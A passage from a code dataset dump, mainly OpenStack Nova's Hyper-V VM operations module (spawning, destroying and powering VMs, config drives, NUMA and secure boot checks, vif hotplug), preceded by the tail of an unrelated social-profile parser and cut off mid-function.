data['twitter_listed'] = raw_data['listed_count']
data['twitter_statuses'] = raw_data['statuses_count']
data['twitter_favourites'] = raw_data['favourites_count']
if raw_data['description'] == '':
data['twitter_description'] = 0
else:
data['twitter_description'] = 1
return data
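# Example (sketch; the on-disk layout of the crawler's JSON dumps is an
# assumption, not part of this module):
#   stats = user_parser('./Data/users/alice.json')
#   stats.update(twitter_parser('./Data/twitter/alice.json'))
#   # -> one flat dict mixing Medium and Twitter counters for the user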
| mit | -755,214,441,095,604,200 | 38.455882 | 120 | 0.600447 | false | 3.601342 | false | false | false |
openstack/nova | nova/virt/hyperv/vmops.py | 2 | 50873 | # Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for basic VM operations.
"""
import contextlib
import functools
import os
import time
from eventlet import timeout as etimeout
from os_win import constants as os_win_const
from os_win import exceptions as os_win_exc
from os_win import utilsfactory
from oslo_concurrency import processutils
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import fileutils
from oslo_utils import units
from oslo_utils import uuidutils
from nova.api.metadata import base as instance_metadata
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import fields
from nova import version
from nova.virt import configdrive
from nova.virt import hardware
from nova.virt.hyperv import block_device_manager
from nova.virt.hyperv import constants
from nova.virt.hyperv import imagecache
from nova.virt.hyperv import pathutils
from nova.virt.hyperv import serialconsoleops
from nova.virt.hyperv import vif as vif_utils
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
SHUTDOWN_TIME_INCREMENT = 5
REBOOT_TYPE_SOFT = 'SOFT'
REBOOT_TYPE_HARD = 'HARD'
VM_GENERATIONS = {
constants.IMAGE_PROP_VM_GEN_1: constants.VM_GEN_1,
constants.IMAGE_PROP_VM_GEN_2: constants.VM_GEN_2
}
VM_GENERATIONS_CONTROLLER_TYPES = {
constants.VM_GEN_1: constants.CTRL_TYPE_IDE,
constants.VM_GEN_2: constants.CTRL_TYPE_SCSI
}
def check_admin_permissions(function):
@functools.wraps(function)
def wrapper(self, *args, **kwds):
# Make sure the windows account has the required admin permissions.
self._vmutils.check_admin_permissions()
return function(self, *args, **kwds)
return wrapper
class VMOps(object):
    # The console log is stored in two files, each of which should have at
    # most half of the maximum console log size.
_MAX_CONSOLE_LOG_FILE_SIZE = units.Mi / 2
_ROOT_DISK_CTRL_ADDR = 0
def __init__(self, virtapi=None):
self._virtapi = virtapi
self._vmutils = utilsfactory.get_vmutils()
self._metricsutils = utilsfactory.get_metricsutils()
self._vhdutils = utilsfactory.get_vhdutils()
self._hostutils = utilsfactory.get_hostutils()
self._migrutils = utilsfactory.get_migrationutils()
self._pathutils = pathutils.PathUtils()
self._volumeops = volumeops.VolumeOps()
self._imagecache = imagecache.ImageCache()
self._serial_console_ops = serialconsoleops.SerialConsoleOps()
self._block_dev_man = (
block_device_manager.BlockDeviceInfoManager())
self._vif_driver = vif_utils.HyperVVIFDriver()
def list_instance_uuids(self):
instance_uuids = []
for (instance_name, notes) in self._vmutils.list_instance_notes():
if notes and uuidutils.is_uuid_like(notes[0]):
instance_uuids.append(str(notes[0]))
else:
LOG.debug("Notes not found or not resembling a GUID for "
"instance: %s", instance_name)
return instance_uuids
def list_instances(self):
return self._vmutils.list_instances()
def get_info(self, instance):
"""Get information about the VM."""
LOG.debug("get_info called for instance", instance=instance)
instance_name = instance.name
if not self._vmutils.vm_exists(instance_name):
raise exception.InstanceNotFound(instance_id=instance.uuid)
info = self._vmutils.get_vm_summary_info(instance_name)
state = constants.HYPERV_POWER_STATE[info['EnabledState']]
return hardware.InstanceInfo(state=state)
def _create_root_device(self, context, instance, root_disk_info, vm_gen):
path = None
if root_disk_info['type'] == constants.DISK:
path = self._create_root_vhd(context, instance)
self.check_vm_image_type(instance.uuid, vm_gen, path)
root_disk_info['path'] = path
def _create_root_vhd(self, context, instance, rescue_image_id=None):
is_rescue_vhd = rescue_image_id is not None
base_vhd_path = self._imagecache.get_cached_image(context, instance,
rescue_image_id)
base_vhd_info = self._vhdutils.get_vhd_info(base_vhd_path)
base_vhd_size = base_vhd_info['VirtualSize']
format_ext = base_vhd_path.split('.')[-1]
root_vhd_path = self._pathutils.get_root_vhd_path(instance.name,
format_ext,
is_rescue_vhd)
root_vhd_size = instance.flavor.root_gb * units.Gi
try:
if CONF.use_cow_images:
LOG.debug("Creating differencing VHD. Parent: "
"%(base_vhd_path)s, Target: %(root_vhd_path)s",
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path},
instance=instance)
self._vhdutils.create_differencing_vhd(root_vhd_path,
base_vhd_path)
vhd_type = self._vhdutils.get_vhd_format(base_vhd_path)
if vhd_type == constants.DISK_FORMAT_VHD:
# The base image has already been resized. As differencing
# vhdx images support it, the root image will be resized
# instead if needed.
return root_vhd_path
else:
LOG.debug("Copying VHD image %(base_vhd_path)s to target: "
"%(root_vhd_path)s",
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path},
instance=instance)
self._pathutils.copyfile(base_vhd_path, root_vhd_path)
root_vhd_internal_size = (
self._vhdutils.get_internal_vhd_size_by_file_size(
base_vhd_path, root_vhd_size))
if not is_rescue_vhd and self._is_resize_needed(
root_vhd_path, base_vhd_size,
root_vhd_internal_size, instance):
self._vhdutils.resize_vhd(root_vhd_path,
root_vhd_internal_size,
is_file_max_size=False)
except Exception:
with excutils.save_and_reraise_exception():
if self._pathutils.exists(root_vhd_path):
self._pathutils.remove(root_vhd_path)
return root_vhd_path
def _is_resize_needed(self, vhd_path, old_size, new_size, instance):
if new_size < old_size:
raise exception.FlavorDiskSmallerThanImage(
flavor_size=new_size, image_size=old_size)
elif new_size > old_size:
LOG.debug("Resizing VHD %(vhd_path)s to new "
"size %(new_size)s",
{'new_size': new_size,
'vhd_path': vhd_path},
instance=instance)
return True
return False
def _create_ephemerals(self, instance, ephemerals):
for index, eph in enumerate(ephemerals):
eph['format'] = self._vhdutils.get_best_supported_vhd_format()
eph_name = "eph%s" % index
eph['path'] = self._pathutils.get_ephemeral_vhd_path(
instance.name, eph['format'], eph_name)
self.create_ephemeral_disk(instance.name, eph)
def create_ephemeral_disk(self, instance_name, eph_info):
self._vhdutils.create_dynamic_vhd(eph_info['path'],
eph_info['size'] * units.Gi)
@staticmethod
def _get_vif_metadata(context, instance_id):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance_id)
vif_metadata = []
for vif in vifs:
if 'tag' in vif and vif.tag:
device = objects.NetworkInterfaceMetadata(
mac=vif.address,
bus=objects.PCIDeviceBus(),
tags=[vif.tag])
vif_metadata.append(device)
return vif_metadata
def _save_device_metadata(self, context, instance, block_device_info):
"""Builds a metadata object for instance devices, that maps the user
provided tag to the hypervisor assigned device address.
"""
metadata = []
metadata.extend(self._get_vif_metadata(context, instance.uuid))
if block_device_info:
metadata.extend(self._block_dev_man.get_bdm_metadata(
context, instance, block_device_info))
if metadata:
instance.device_metadata = objects.InstanceDeviceMetadata(
devices=metadata)
def set_boot_order(self, instance_name, vm_gen, block_device_info):
boot_order = self._block_dev_man.get_boot_order(
vm_gen, block_device_info)
LOG.debug("Setting boot order for instance: %(instance_name)s: "
"%(boot_order)s", {'instance_name': instance_name,
'boot_order': boot_order})
self._vmutils.set_boot_order(instance_name, boot_order)
@check_admin_permissions
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info=None):
"""Create a new VM and start it."""
LOG.info("Spawning new instance", instance=instance)
instance_name = instance.name
if self._vmutils.vm_exists(instance_name):
raise exception.InstanceExists(name=instance_name)
# Make sure we're starting with a clean slate.
self._delete_disk_files(instance_name)
vm_gen = self.get_image_vm_generation(instance.uuid, image_meta)
self._block_dev_man.validate_and_update_bdi(
instance, image_meta, vm_gen, block_device_info)
root_device = block_device_info['root_disk']
self._create_root_device(context, instance, root_device, vm_gen)
self._create_ephemerals(instance, block_device_info['ephemerals'])
try:
with self.wait_vif_plug_events(instance, network_info):
                # the wait for vif plug events happens when this context
                # manager exits, i.e. after the instance is created.
self.create_instance(instance, network_info, root_device,
block_device_info, vm_gen, image_meta)
# This is supported starting from OVS version 2.5
self.plug_vifs(instance, network_info)
self._save_device_metadata(context, instance, block_device_info)
if configdrive.required_by(instance):
configdrive_path = self._create_config_drive(context,
instance,
injected_files,
admin_password,
network_info)
self.attach_config_drive(instance, configdrive_path, vm_gen)
self.set_boot_order(instance.name, vm_gen, block_device_info)
# vifs are already plugged in at this point. We waited on the vif
# plug event previously when we created the instance. Skip the
# plug vifs during power on in this case
self.power_on(instance,
network_info=network_info,
should_plug_vifs=False)
except Exception:
with excutils.save_and_reraise_exception():
self.destroy(instance, network_info, block_device_info)
@contextlib.contextmanager
def wait_vif_plug_events(self, instance, network_info):
timeout = CONF.vif_plugging_timeout
try:
# NOTE(claudiub): async calls to bind the neutron ports will be
# done when network_info is being accessed.
events = self._get_neutron_events(network_info)
with self._virtapi.wait_for_instance_event(
instance, events, deadline=timeout,
error_callback=self._neutron_failed_callback):
yield
except etimeout.Timeout:
# We never heard from Neutron
LOG.warning('Timeout waiting for vif plugging callback for '
'instance.', instance=instance)
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
except exception.PortBindingFailed:
LOG.warning(
"Neutron failed to bind a port to this host. Make sure that "
"an L2 agent is alive and registered from this node (neutron "
"Open vSwitch agent or Hyper-V agent), or make sure that "
"neutron is configured with a mechanism driver that is able "
"to bind ports to this host (OVN). If you are using neutron "
"Hyper-V agent, make sure that networking-hyperv is installed "
"on the neutron controller, and that the neutron-server was "
"configured to use the 'hyperv' mechanism_driver.")
raise
def _neutron_failed_callback(self, event_name, instance):
LOG.error('Neutron Reported failure on event %s',
event_name, instance=instance)
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
def _get_neutron_events(self, network_info):
# NOTE(danms): We need to collect any VIFs that are currently
# down that we expect a down->up event for. Anything that is
# already up will not undergo that transition, and for
# anything that might be stale (cache-wise) assume it's
# already up so we don't block on it.
if CONF.vif_plugging_timeout:
return [('network-vif-plugged', vif['id'])
for vif in network_info if vif.get('active') is False]
return []
def create_instance(self, instance, network_info, root_device,
block_device_info, vm_gen, image_meta):
instance_name = instance.name
instance_path = os.path.join(CONF.instances_path, instance_name)
secure_boot_enabled = self._requires_secure_boot(instance, image_meta,
vm_gen)
memory_per_numa_node, cpus_per_numa_node = (
self._get_instance_vnuma_config(instance, image_meta))
if memory_per_numa_node:
LOG.debug("Instance requires vNUMA topology. Host's NUMA spanning "
"has to be disabled in order for the instance to "
"benefit from it.", instance=instance)
if CONF.hyperv.dynamic_memory_ratio > 1.0:
LOG.warning(
"Instance vNUMA topology requested, but dynamic memory "
"ratio is higher than 1.0 in nova.conf. Ignoring dynamic "
"memory ratio option.", instance=instance)
dynamic_memory_ratio = 1.0
vnuma_enabled = True
else:
dynamic_memory_ratio = CONF.hyperv.dynamic_memory_ratio
vnuma_enabled = False
if instance.pci_requests.requests:
# NOTE(claudiub): if the instance requires PCI devices, its
# host shutdown action MUST be shutdown.
host_shutdown_action = os_win_const.HOST_SHUTDOWN_ACTION_SHUTDOWN
else:
host_shutdown_action = None
self._vmutils.create_vm(instance_name,
vnuma_enabled,
vm_gen,
instance_path,
[instance.uuid])
self._vmutils.update_vm(instance_name,
instance.flavor.memory_mb,
memory_per_numa_node,
instance.flavor.vcpus,
cpus_per_numa_node,
CONF.hyperv.limit_cpu_features,
dynamic_memory_ratio,
host_shutdown_action=host_shutdown_action,
chassis_asset_tag=version.product_string())
self._configure_remotefx(instance, vm_gen)
self._vmutils.create_scsi_controller(instance_name)
self._attach_root_device(instance_name, root_device)
self._attach_ephemerals(instance_name, block_device_info['ephemerals'])
self._volumeops.attach_volumes(
block_device_info['block_device_mapping'], instance_name)
# For the moment, we use COM port 1 when getting the serial console
# log as well as interactive sessions. In the future, the way in which
# we consume instance serial ports may become configurable.
#
# Note that Hyper-V instances will always have 2 COM ports
serial_ports = {
constants.DEFAULT_SERIAL_CONSOLE_PORT:
constants.SERIAL_PORT_TYPE_RW}
self._create_vm_com_port_pipes(instance, serial_ports)
for vif in network_info:
LOG.debug('Creating nic for instance', instance=instance)
self._vmutils.create_nic(instance_name,
vif['id'],
vif['address'])
if CONF.hyperv.enable_instance_metrics_collection:
self._metricsutils.enable_vm_metrics_collection(instance_name)
self._set_instance_disk_qos_specs(instance)
if secure_boot_enabled:
certificate_required = self._requires_certificate(image_meta)
self._vmutils.enable_secure_boot(
instance.name, msft_ca_required=certificate_required)
self._attach_pci_devices(instance)
def _attach_pci_devices(self, instance):
for pci_request in instance.pci_requests.requests:
spec = pci_request.spec[0]
for counter in range(pci_request.count):
self._vmutils.add_pci_device(instance.name,
spec['vendor_id'],
spec['product_id'])
def _get_instance_vnuma_config(self, instance, image_meta):
"""Returns the appropriate NUMA configuration for Hyper-V instances,
given the desired instance NUMA topology.
        :param instance: instance containing the flavor and its extra_specs,
where the NUMA topology is defined.
:param image_meta: image's metadata, containing properties related to
the instance's NUMA topology.
:returns: memory amount and number of vCPUs per NUMA node or
(None, None), if instance NUMA topology was not requested.
:raises exception.InstanceUnacceptable:
If the given instance NUMA topology is not possible on Hyper-V, or
if CPU pinning is required.
"""
instance_topology = hardware.numa_get_constraints(instance.flavor,
image_meta)
if not instance_topology:
# instance NUMA topology was not requested.
return None, None
memory_per_numa_node = instance_topology.cells[0].memory
cpus_per_numa_node = len(instance_topology.cells[0].cpuset)
# TODO(stephenfin): We can avoid this check entirely if we rely on the
# 'supports_pcpus' driver capability (via a trait), but we need to drop
# support for the legacy 'vcpu_pin_set' path in the libvirt driver
# first
if instance_topology.cpu_policy not in (
None, fields.CPUAllocationPolicy.SHARED,
):
raise exception.InstanceUnacceptable(
reason=_("Hyper-V does not support CPU pinning."),
instance_id=instance.uuid)
        # validate that the requested NUMA topology is not asymmetric.
# e.g.: it should be like: (X cpus, X cpus, Y cpus), where X == Y.
# same with memory.
for cell in instance_topology.cells:
if len(cell.cpuset) != cpus_per_numa_node:
reason = _("Hyper-V does not support NUMA topologies with "
"uneven number of processors. (%(a)s != %(b)s)") % {
'a': len(cell.cpuset), 'b': cpus_per_numa_node}
raise exception.InstanceUnacceptable(reason=reason,
instance_id=instance.uuid)
if cell.memory != memory_per_numa_node:
reason = _("Hyper-V does not support NUMA topologies with "
"uneven amounts of memory. (%(a)s != %(b)s)") % {
'a': cell.memory, 'b': memory_per_numa_node}
raise exception.InstanceUnacceptable(reason=reason,
instance_id=instance.uuid)
return memory_per_numa_node, cpus_per_numa_node
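    # Illustrative example for _get_instance_vnuma_config above (flavor
    # values assumed): 4 vCPUs / 4096 MB with hw:numa_nodes=2 yields two
    # symmetric cells of 2 vCPUs / 2048 MB, so this method returns (2048, 2).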
def _configure_remotefx(self, instance, vm_gen):
extra_specs = instance.flavor.extra_specs
remotefx_max_resolution = extra_specs.get(
constants.FLAVOR_ESPEC_REMOTEFX_RES)
if not remotefx_max_resolution:
# RemoteFX not required.
return
if not CONF.hyperv.enable_remotefx:
raise exception.InstanceUnacceptable(
_("enable_remotefx configuration option needs to be set to "
"True in order to use RemoteFX."))
if not self._hostutils.check_server_feature(
self._hostutils.FEATURE_RDS_VIRTUALIZATION):
raise exception.InstanceUnacceptable(
_("The RDS-Virtualization feature must be installed in order "
"to use RemoteFX."))
if not self._vmutils.vm_gen_supports_remotefx(vm_gen):
raise exception.InstanceUnacceptable(
_("RemoteFX is not supported on generation %s virtual "
"machines on this version of Windows.") % vm_gen)
instance_name = instance.name
LOG.debug('Configuring RemoteFX for instance: %s', instance_name)
remotefx_monitor_count = int(extra_specs.get(
constants.FLAVOR_ESPEC_REMOTEFX_MONITORS) or 1)
remotefx_vram = extra_specs.get(
constants.FLAVOR_ESPEC_REMOTEFX_VRAM)
vram_bytes = int(remotefx_vram) * units.Mi if remotefx_vram else None
self._vmutils.enable_remotefx_video_adapter(
instance_name,
remotefx_monitor_count,
remotefx_max_resolution,
vram_bytes)
def _attach_root_device(self, instance_name, root_dev_info):
if root_dev_info['type'] == constants.VOLUME:
self._volumeops.attach_volume(root_dev_info['connection_info'],
instance_name,
disk_bus=root_dev_info['disk_bus'])
else:
self._attach_drive(instance_name, root_dev_info['path'],
root_dev_info['drive_addr'],
root_dev_info['ctrl_disk_addr'],
root_dev_info['disk_bus'],
root_dev_info['type'])
def _attach_ephemerals(self, instance_name, ephemerals):
for eph in ephemerals:
# if an ephemeral doesn't have a path, it might have been removed
# during resize.
if eph.get('path'):
self._attach_drive(
instance_name, eph['path'], eph['drive_addr'],
eph['ctrl_disk_addr'], eph['disk_bus'],
constants.BDI_DEVICE_TYPE_TO_DRIVE_TYPE[
eph['device_type']])
def _attach_drive(self, instance_name, path, drive_addr, ctrl_disk_addr,
controller_type, drive_type=constants.DISK):
if controller_type == constants.CTRL_TYPE_SCSI:
self._vmutils.attach_scsi_drive(instance_name, path, drive_type)
else:
self._vmutils.attach_ide_drive(instance_name, path, drive_addr,
ctrl_disk_addr, drive_type)
def get_image_vm_generation(self, instance_id, image_meta):
default_vm_gen = self._hostutils.get_default_vm_generation()
image_prop_vm = image_meta.properties.get('hw_machine_type',
default_vm_gen)
if image_prop_vm not in self._hostutils.get_supported_vm_types():
reason = _('Requested VM Generation %s is not supported on '
'this OS.') % image_prop_vm
raise exception.InstanceUnacceptable(instance_id=instance_id,
reason=reason)
return VM_GENERATIONS[image_prop_vm]
def check_vm_image_type(self, instance_id, vm_gen, root_vhd_path):
if (vm_gen != constants.VM_GEN_1 and root_vhd_path and
self._vhdutils.get_vhd_format(
root_vhd_path) == constants.DISK_FORMAT_VHD):
reason = _('Requested VM Generation %s, but provided VHD '
'instead of VHDX.') % vm_gen
raise exception.InstanceUnacceptable(instance_id=instance_id,
reason=reason)
def _requires_certificate(self, image_meta):
os_type = image_meta.properties.get('os_type')
if os_type == fields.OSType.WINDOWS:
return False
return True
def _requires_secure_boot(self, instance, image_meta, vm_gen):
"""Checks whether the given instance requires Secure Boot.
Secure Boot feature will be enabled by setting the "os_secure_boot"
image property or the "os:secure_boot" flavor extra spec to required.
:raises exception.InstanceUnacceptable: if the given image_meta has
no os_type property set, or if the image property value and the
flavor extra spec value are conflicting, or if Secure Boot is
required, but the instance's VM generation is 1.
"""
img_secure_boot = image_meta.properties.get('os_secure_boot')
flavor_secure_boot = instance.flavor.extra_specs.get(
constants.FLAVOR_SPEC_SECURE_BOOT)
requires_sb = False
conflicting_values = False
if flavor_secure_boot == fields.SecureBoot.REQUIRED:
requires_sb = True
if img_secure_boot == fields.SecureBoot.DISABLED:
conflicting_values = True
elif img_secure_boot == fields.SecureBoot.REQUIRED:
requires_sb = True
if flavor_secure_boot == fields.SecureBoot.DISABLED:
conflicting_values = True
if conflicting_values:
reason = _(
"Conflicting image metadata property and flavor extra_specs "
"values: os_secure_boot (%(image_secure_boot)s) / "
"os:secure_boot (%(flavor_secure_boot)s)") % {
'image_secure_boot': img_secure_boot,
'flavor_secure_boot': flavor_secure_boot}
raise exception.InstanceUnacceptable(instance_id=instance.uuid,
reason=reason)
if requires_sb:
if vm_gen != constants.VM_GEN_2:
reason = _('Secure boot requires generation 2 VM.')
raise exception.InstanceUnacceptable(instance_id=instance.uuid,
reason=reason)
os_type = image_meta.properties.get('os_type')
if not os_type:
reason = _('For secure boot, os_type must be specified in '
'image properties.')
raise exception.InstanceUnacceptable(instance_id=instance.uuid,
reason=reason)
return requires_sb
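    # Decision summary for _requires_secure_boot above:
    #   flavor REQUIRED + image DISABLED (or vice versa) -> conflict error;
    #   either side REQUIRED without conflict -> secure boot enforced, which
    #   additionally demands a generation 2 VM and an os_type image property;
    #   otherwise secure boot is not required.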
def _create_config_drive(self, context, instance, injected_files,
admin_password, network_info, rescue=False):
if CONF.config_drive_format != 'iso9660':
raise exception.ConfigDriveUnsupportedFormat(
format=CONF.config_drive_format)
LOG.info('Using config drive for instance', instance=instance)
extra_md = {}
if admin_password and CONF.hyperv.config_drive_inject_password:
extra_md['admin_pass'] = admin_password
inst_md = instance_metadata.InstanceMetadata(
instance, content=injected_files, extra_md=extra_md,
network_info=network_info)
configdrive_path_iso = self._pathutils.get_configdrive_path(
instance.name, constants.DVD_FORMAT, rescue=rescue)
LOG.info('Creating config drive at %(path)s',
{'path': configdrive_path_iso}, instance=instance)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
try:
cdb.make_drive(configdrive_path_iso)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error('Creating config drive failed with '
'error: %s', e, instance=instance)
if not CONF.hyperv.config_drive_cdrom:
configdrive_path = self._pathutils.get_configdrive_path(
instance.name, constants.DISK_FORMAT_VHD, rescue=rescue)
processutils.execute(CONF.hyperv.qemu_img_cmd,
'convert',
'-f',
'raw',
'-O',
'vpc',
configdrive_path_iso,
configdrive_path,
attempts=1)
self._pathutils.remove(configdrive_path_iso)
else:
configdrive_path = configdrive_path_iso
return configdrive_path
def attach_config_drive(self, instance, configdrive_path, vm_gen):
configdrive_ext = configdrive_path[(configdrive_path.rfind('.') + 1):]
# Do the attach here and if there is a certain file format that isn't
# supported in constants.DISK_FORMAT_MAP then bomb out.
try:
drive_type = constants.DISK_FORMAT_MAP[configdrive_ext]
controller_type = VM_GENERATIONS_CONTROLLER_TYPES[vm_gen]
self._attach_drive(instance.name, configdrive_path, 1, 0,
controller_type, drive_type)
except KeyError:
raise exception.InvalidDiskFormat(disk_format=configdrive_ext)
def _detach_config_drive(self, instance_name, rescue=False, delete=False):
configdrive_path = self._pathutils.lookup_configdrive_path(
instance_name, rescue=rescue)
if configdrive_path:
self._vmutils.detach_vm_disk(instance_name,
configdrive_path,
is_physical=False)
if delete:
self._pathutils.remove(configdrive_path)
@serialconsoleops.instance_synchronized
def _delete_disk_files(self, instance_name):
# We want to avoid the situation in which serial console workers
# are started while we perform this operation, preventing us from
# deleting the instance log files (bug #1556189). This can happen
# due to delayed instance lifecycle events.
#
# The unsynchronized method is being used to avoid a deadlock.
self._serial_console_ops.stop_console_handler_unsync(instance_name)
self._pathutils.get_instance_dir(instance_name,
create_dir=False,
remove_dir=True)
def destroy(self, instance, network_info, block_device_info,
destroy_disks=True):
instance_name = instance.name
LOG.info("Got request to destroy instance", instance=instance)
try:
if self._vmutils.vm_exists(instance_name):
# Stop the VM first.
self._vmutils.stop_vm_jobs(instance_name)
self.power_off(instance)
self._vmutils.destroy_vm(instance_name)
elif self._migrutils.planned_vm_exists(instance_name):
self._migrutils.destroy_existing_planned_vm(instance_name)
else:
LOG.debug("Instance not found", instance=instance)
# NOTE(claudiub): The vifs should be unplugged and the volumes
# should be disconnected even if the VM doesn't exist anymore,
# so they are not leaked.
self.unplug_vifs(instance, network_info)
self._volumeops.disconnect_volumes(block_device_info)
if destroy_disks:
self._delete_disk_files(instance_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception('Failed to destroy instance: %s', instance_name)
def reboot(self, instance, network_info, reboot_type):
"""Reboot the specified instance."""
LOG.debug("Rebooting instance", instance=instance)
if reboot_type == REBOOT_TYPE_SOFT:
if self._soft_shutdown(instance):
self.power_on(instance, network_info=network_info)
return
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_REBOOT)
def _soft_shutdown(self, instance,
timeout=CONF.hyperv.wait_soft_reboot_seconds,
retry_interval=SHUTDOWN_TIME_INCREMENT):
"""Perform a soft shutdown on the VM.
:return: True if the instance was shutdown within time limit,
False otherwise.
"""
LOG.debug("Performing Soft shutdown on instance", instance=instance)
while timeout > 0:
# Perform a soft shutdown on the instance.
# Wait maximum timeout for the instance to be shutdown.
# If it was not shutdown, retry until it succeeds or a maximum of
# time waited is equal to timeout.
wait_time = min(retry_interval, timeout)
try:
LOG.debug("Soft shutdown instance, timeout remaining: %d",
timeout, instance=instance)
self._vmutils.soft_shutdown_vm(instance.name)
if self._wait_for_power_off(instance.name, wait_time):
LOG.info("Soft shutdown succeeded.",
instance=instance)
return True
except os_win_exc.HyperVException as e:
# Exception is raised when trying to shutdown the instance
# while it is still booting.
LOG.debug("Soft shutdown failed: %s", e, instance=instance)
time.sleep(wait_time)
timeout -= retry_interval
LOG.warning("Timed out while waiting for soft shutdown.",
instance=instance)
return False
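    # Timing note for _soft_shutdown above: with
    # retry_interval=SHUTDOWN_TIME_INCREMENT (5s), a 60 second timeout
    # allows up to 12 soft shutdown attempts before returning False.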
def pause(self, instance):
"""Pause VM instance."""
LOG.debug("Pause instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_PAUSED)
def unpause(self, instance):
"""Unpause paused VM instance."""
LOG.debug("Unpause instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_ENABLED)
def suspend(self, instance):
"""Suspend the specified instance."""
LOG.debug("Suspend instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_SUSPENDED)
def resume(self, instance):
"""Resume the suspended VM instance."""
LOG.debug("Resume instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_ENABLED)
def power_off(self, instance, timeout=0, retry_interval=0):
"""Power off the specified instance."""
LOG.debug("Power off instance", instance=instance)
# We must make sure that the console log workers are stopped,
# otherwise we won't be able to delete or move the VM log files.
self._serial_console_ops.stop_console_handler(instance.name)
if retry_interval <= 0:
retry_interval = SHUTDOWN_TIME_INCREMENT
try:
if timeout and self._soft_shutdown(instance,
timeout,
retry_interval):
return
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_DISABLED)
except os_win_exc.HyperVVMNotFoundException:
# The manager can call the stop API after receiving instance
# power off events. If this is triggered when the instance
            # is being deleted, it might attempt to power off a nonexistent
# instance. We'll just pass in this case.
LOG.debug("Instance not found. Skipping power off",
instance=instance)
def power_on(self, instance, block_device_info=None, network_info=None,
should_plug_vifs=True):
"""Power on the specified instance."""
LOG.debug("Power on instance", instance=instance)
if block_device_info:
self._volumeops.fix_instance_volume_disk_paths(instance.name,
block_device_info)
if should_plug_vifs:
self.plug_vifs(instance, network_info)
self._set_vm_state(instance, os_win_const.HYPERV_VM_STATE_ENABLED)
def _set_vm_state(self, instance, req_state):
instance_name = instance.name
try:
self._vmutils.set_vm_state(instance_name, req_state)
LOG.debug("Successfully changed state of VM %(instance_name)s"
" to: %(req_state)s", {'instance_name': instance_name,
'req_state': req_state})
except Exception:
with excutils.save_and_reraise_exception():
LOG.error("Failed to change vm state of %(instance_name)s"
" to %(req_state)s",
{'instance_name': instance_name,
'req_state': req_state})
def _get_vm_state(self, instance_name):
summary_info = self._vmutils.get_vm_summary_info(instance_name)
return summary_info['EnabledState']
def _wait_for_power_off(self, instance_name, time_limit):
"""Waiting for a VM to be in a disabled state.
:return: True if the instance is shutdown within time_limit,
False otherwise.
"""
desired_vm_states = [os_win_const.HYPERV_VM_STATE_DISABLED]
def _check_vm_status(instance_name):
if self._get_vm_state(instance_name) in desired_vm_states:
raise loopingcall.LoopingCallDone()
periodic_call = loopingcall.FixedIntervalLoopingCall(_check_vm_status,
instance_name)
try:
# add a timeout to the periodic call.
periodic_call.start(interval=SHUTDOWN_TIME_INCREMENT)
etimeout.with_timeout(time_limit, periodic_call.wait)
except etimeout.Timeout:
# VM did not shutdown in the expected time_limit.
return False
finally:
# stop the periodic call, in case of exceptions or Timeout.
periodic_call.stop()
return True
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""Resume guest state when a host is booted."""
self.power_on(instance, block_device_info, network_info)
def _create_vm_com_port_pipes(self, instance, serial_ports):
for port_number, port_type in serial_ports.items():
pipe_path = r'\\.\pipe\%s_%s' % (instance.uuid, port_type)
self._vmutils.set_vm_serial_port_connection(
instance.name, port_number, pipe_path)
def copy_vm_dvd_disks(self, vm_name, dest_host):
dvd_disk_paths = self._vmutils.get_vm_dvd_disk_paths(vm_name)
dest_path = self._pathutils.get_instance_dir(
vm_name, remote_server=dest_host)
for path in dvd_disk_paths:
self._pathutils.copyfile(path, dest_path)
def plug_vifs(self, instance, network_info):
if network_info:
for vif in network_info:
self._vif_driver.plug(instance, vif)
def unplug_vifs(self, instance, network_info):
if network_info:
for vif in network_info:
self._vif_driver.unplug(instance, vif)
def _check_hotplug_available(self, instance):
"""Check whether attaching an interface is possible for the given
instance.
:returns: True if attaching / detaching interfaces is possible for the
given instance.
"""
vm_state = self._get_vm_state(instance.name)
if vm_state == os_win_const.HYPERV_VM_STATE_DISABLED:
# can attach / detach interface to stopped VMs.
return True
if not self._hostutils.check_min_windows_version(10, 0):
            # TODO(claudiub): set log level to error after the string freeze.
LOG.debug("vNIC hot plugging is supported only in newer "
"versions than Windows Hyper-V / Server 2012 R2.")
return False
if (self._vmutils.get_vm_generation(instance.name) ==
constants.VM_GEN_1):
            # TODO(claudiub): set log level to error after the string freeze.
LOG.debug("Cannot hot plug vNIC to a first generation VM.",
instance=instance)
return False
return True
def attach_interface(self, instance, vif):
if not self._check_hotplug_available(instance):
raise exception.InterfaceAttachFailed(instance_uuid=instance.uuid)
LOG.debug('Attaching vif: %s', vif['id'], instance=instance)
self._vmutils.create_nic(instance.name, vif['id'], vif['address'])
self._vif_driver.plug(instance, vif)
def detach_interface(self, instance, vif):
try:
if not self._check_hotplug_available(instance):
